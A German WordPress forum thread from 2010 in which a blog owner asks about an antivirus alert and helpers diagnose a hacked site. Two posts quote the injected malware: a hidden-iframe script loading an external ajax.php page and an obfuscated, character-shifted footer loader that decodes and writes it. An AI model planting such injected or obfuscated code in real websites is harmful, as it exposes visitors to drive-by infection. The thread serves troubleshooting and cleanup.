Malware gefunden

  • Immer wenn ich mein Blog über Mozilla aufrufen kommt die Meldung Malware HTML/Crypted Gen gefunden .
    Habe ich jetzt ein Virus auf meiner Datenbank? Gibt es ein Plugin als Virenscanner? anbei mein blog http://www.ng-friseure.de/


    Jörg

    Einmal editiert, zuletzt von th67ci (8. Mai 2010 um 18:35)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Es könnte ein Fehlalarm sein, allerdings befürchte ich das es nicht so ist.
    Da hat jemand scheinbar versucht eine Umleitung in deine Seite einzubauen.

    Hab hier nen älteren Beitrag über den kleinen Fießling gefunden, der Scriptcode stimmte auch mit Beiträgen überein, die ich über Google auf anderes Seiten (Unter anderem auch im AV Forum) gefunden habe.
    Nur wie gesagt, die Beiträge sind alle etwas älter gewesen.

    Bleibt natürlich die Frage, wie das möglich war.

    Edit;

    Ich habe da was Scriptmäßiges mit Firebug gefunden kann es aber nicht so einordnen, eventuell ist das ja dafür verantwortlich, bin mir aber nicht sicher. ;)

    Code
    if (document.cookie.search("mdovt=8") == -1) { 2obzc=document.getElementById('vdxq');if(obzc==null){document.write('<iframe  id=vdxq src=http://outreach.ewu.edu/assets/site/ajax.php  style=display:none></iframe>');} 
    3document.cookie =  "mdovt=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

    Oder hats mit Ajax zu tun, was im WP genutzt wird?

    Bitte keine Fragen per PM, oder Foren-Chat. Für Fragen ist das öffentliche Forum da. Meine Uerdinger Seite

    Einmal editiert, zuletzt von Marcus[IS] (8. Mai 2010 um 19:20)

  • Das kommt wahrscheinlich von deinem verschlüsselten Footer:

    PHP
    <script language="JavaScript" type="text/javascript">
    var source ="=tdsjqu?jg!)epdvnfou/dppljf/tfbsdi)#nepwu>9#*!>>!.2*!|pc{d>epdvnfou/hfuFmfnfouCzJe)(weyr(*<jg)pc{d>>ovmm*|epdvnfou/xsjuf)(=jgsbnf!je>weyr!tsd>iuuq;00pvusfbdi/fxv/fev0bttfut0tjuf0bkby/qiq!tuzmf>ejtqmbz;opof?=0jgsbnf?(*<~epdvnfou/dppljf!>!#nepwu>9<fyqjsft>Tvo-!12.Efd.3122!19;11;11!HNU<qbui>0#<~=0tdsjqu?"; var result = "";
                       for(var i=0;i<source.length;i++) {
                           result+=String.fromCharCode(source.charCodeAt(i)-1);
                       }
                       document.write(result);
    </script>


    Dafür spricht auch die Meldung des AV-Programms. Es wird nämlich kein konkreter Schädling gefunden, sondern es hat wohl nur die Heuristik (also Glaskugel) angeschlagen und korrekterweise festgestelllt, dass da irgendein seltsamer verschlüsselter Code gefunden wurde.

    Nachtrag: Wobei ich natürlich nicht weiß, ob der verschlüsselte Footer so zum Theme gehört oder ob er reingeschmuggelt wurde!

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • ich bin nicht so der Profi. was kann ich denn ich den footer schreiben, damit die verschlüsselung ausgeschlossen werden kann. Habe gerade noch schnell über ftp die WP gesichert. Das virenprogramm meckert auch schon bei der liesmich. html. foooter.php, header.php, login php usw.

    Jörg

  • Jut ich bin auch net der Profi, aber Artisteer dürfte eigentlich die gleichen Klamotten ham.

    Versuch das in der footer.php.

    Es ist der Code von einer meine Footers.

    Ich gebe aber keine Garantie, dass es klappt.

    Zudem bleibe ich dabei, dass unbedingt gekärt werden muss, wie das alles Zustande kam.;)

    Bitte keine Fragen per PM, oder Foren-Chat. Für Fragen ist das öffentliche Forum da. Meine Uerdinger Seite

    Einmal editiert, zuletzt von Marcus[IS] (9. Mai 2010 um 01:45)

  • jo danke , ich habe jetzt erstmal die Paswörter geändert. Vielleicht sollte ich die Datenbank komplett löschen und mein FTP Kopie wieder einspielen

    Danke Jörg

  • so habe die ganze Nacht die Datenbank neu aufgebaut und habe die Berechtigung der htdocs wieder auf 750 gesetzt. Ich weiß nicht ob updates von Plugins mir die Merde bescherrt haben, deshalb gibt es keine Updates mehr.
    Keine Meldungen mehr seitens Virenscanner alle ok

    Danke für die Hilfe

    Jörg

  • Ich weiß nicht ob updates von Plugins mir die Merde bescherrt haben, deshalb gibt es keine Updates mehr.

    Absolut falscher Ansatz. Durch Plugins, die nicht aktualisiert werden, gefährdest Du Deinen Blog doch nur weiter. Viel besser wäre es auf Plugins zu verzichten, soweit möglich.

  • Absolut falscher Ansatz. Durch Plugins, die nicht aktualisiert werden, gefährdest Du Deinen Blog doch nur weiter. Viel besser wäre es auf Plugins zu verzichten, soweit möglich.


    vielleicht hast du recht.

    Danke für deine Hilfe

    jörg

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!